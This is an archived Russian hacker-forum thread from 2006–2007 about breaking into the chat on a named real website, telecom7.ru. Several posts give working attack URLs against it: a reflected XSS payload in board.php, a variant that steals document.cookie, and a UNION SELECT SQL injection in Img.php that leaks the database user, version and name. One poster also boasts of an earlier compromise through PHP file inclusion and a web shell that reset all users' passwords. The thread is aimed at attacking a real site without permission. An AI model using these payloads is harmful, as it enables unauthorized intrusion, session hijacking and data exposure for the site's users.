ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

...
  #11  
Старый 21.10.2006, 05:17
corsp_puttrider
Новичок
Регистрация: 16.10.2006
Сообщений: 18
Провел на форуме:
48695

Репутация: 17
По умолчанию ...

Цитата:
Сообщение от vnuki  
to kaban ты дал мне эту ссылкук http://www.telecom7.ru/Chat/board.php?ss="><script>alert(/XSS/)</script>
я её вставил и ты дал ещё одну ссылку чтоб почитать но я так толкьом не понял к чему она.если тебе не трудно то обьясни...пожалуста.
Это значит что первый SQL запрос выдал ошибку => тебе надо присоединить еще один SQL запрос UNION SELECT 1,2,3/* вот тогда первый выдает ошибку выполняется второй, по-моему на этом сайте во второй колонке передается индентификатор рмсунка => можно попытаться исполнить произволбный php код ))
 
Ответить с цитированием

  #12  
Старый 21.10.2006, 16:20
vnuki
Новичок
Регистрация: 20.10.2006
Сообщений: 25
Провел на форуме:
601498

Репутация: 16
Exclamation

Цитата:
Сообщение от corsp_puttrider  
Это значит что первый SQL запрос выдал ошибку => тебе надо присоединить еще один SQL запрос UNION SELECT 1,2,3/* вот тогда первый выдает ошибку выполняется второй, по-моему на этом сайте во второй колонке передается индентификатор рмсунка => можно попытаться исполнить произволбный php код ))
у тебя есть icq ? дай пожалуста я тебе стукну.и ты мне если не трудно обьясни по понятнее.
 
Ответить с цитированием

  #13  
Старый 21.10.2006, 16:28
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Вариант со сукулью не пройдёт не отобразит из за ошибки
http://www.telecom7.ru/Chat/Img.php?id=-211578+union+select+null,user(),null/*
 
Ответить с цитированием

  #14  
Старый 21.10.2006, 19:53
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

2 Nova
а если просмотреть исходный код изображения то получем
USER() telecom7@192.168.212.116
VERSION() 4.0.15a
DATABASE() telecom7
__________________
 
Ответить с цитированием

  #15  
Старый 21.10.2006, 21:31
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Цитата:
Сообщение от +toxa+  
2 Nova
а если просмотреть исходный код изображения то получем
USER() telecom7@192.168.212.116
VERSION() 4.0.15a
DATABASE() telecom7
Мдя а я незаметил =)
 
Ответить с цитированием

  #16  
Старый 18.05.2007, 01:37
JOKER_KILL
Новичок
Регистрация: 19.04.2005
Сообщений: 15
Провел на форуме:
8294

Репутация: 1
Отправить сообщение для JOKER_KILL с помощью ICQ
По умолчанию

Ну так что, его возможно взломать или нет? Что то так никто и не даёт точного ответа! Я слышал что его можно ломануть через сниффер но у меня что то не получилось! Чат его не принимает!
 
Ответить с цитированием

  #17  
Старый 19.05.2007, 23:49
Зубчег
Познающий
Регистрация: 10.12.2006
Сообщений: 41
Провел на форуме:
202200

Репутация: 26
По умолчанию

Joker_kill

Что за бред ты несеш? Прочитай посты, а мы о чём говорим?

И с чего ты сделал вывод, что тут хакеров нету? Если ты слепой это твои проблемы...


Цитата:
Ну так что, его возможно взломать или нет?
ЗАПОМНИ

Всё что создано человеком, можно сломать.
 
Ответить с цитированием

  #18  
Старый 20.05.2007, 13:19
[GeW]
Новичок
Регистрация: 18.04.2007
Сообщений: 22
Провел на форуме:
609007

Репутация: 27
Отправить сообщение для [GeW] с помощью ICQ
По умолчанию

Помнится в конце прошлого лета, я его поломал при помощи php-инклудинга. Затем через веб-шелл в eval() накатал скрипт, для смены пароля для определённого пользователя, но из-за ошибки в этом скрипте у всех пользователей пароль сменился на "p4ssw0rd". Админ 3 дня откат БД делал, а вину всю на своего прова свалил). Потом вроде эту багу прикрыли...
 
Ответить с цитированием

  #19  
Старый 20.05.2007, 13:40
Neorin
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме:
287714

Репутация: 40
По умолчанию

http://www.telecom7.ru/Chat/board.php?ss="><script>alert(document.cookie)</script>
покруи вызови вторую ошибку и всё будет круть))))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!! farik.aka E-Mail 1 17.09.2006 13:00
чАТ ДЛЯ ПОРТАЛА LavInaL Чаты 19 08.06.2006 19:03
чат на telecom7.ru Чаты 1 11.08.2002 16:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ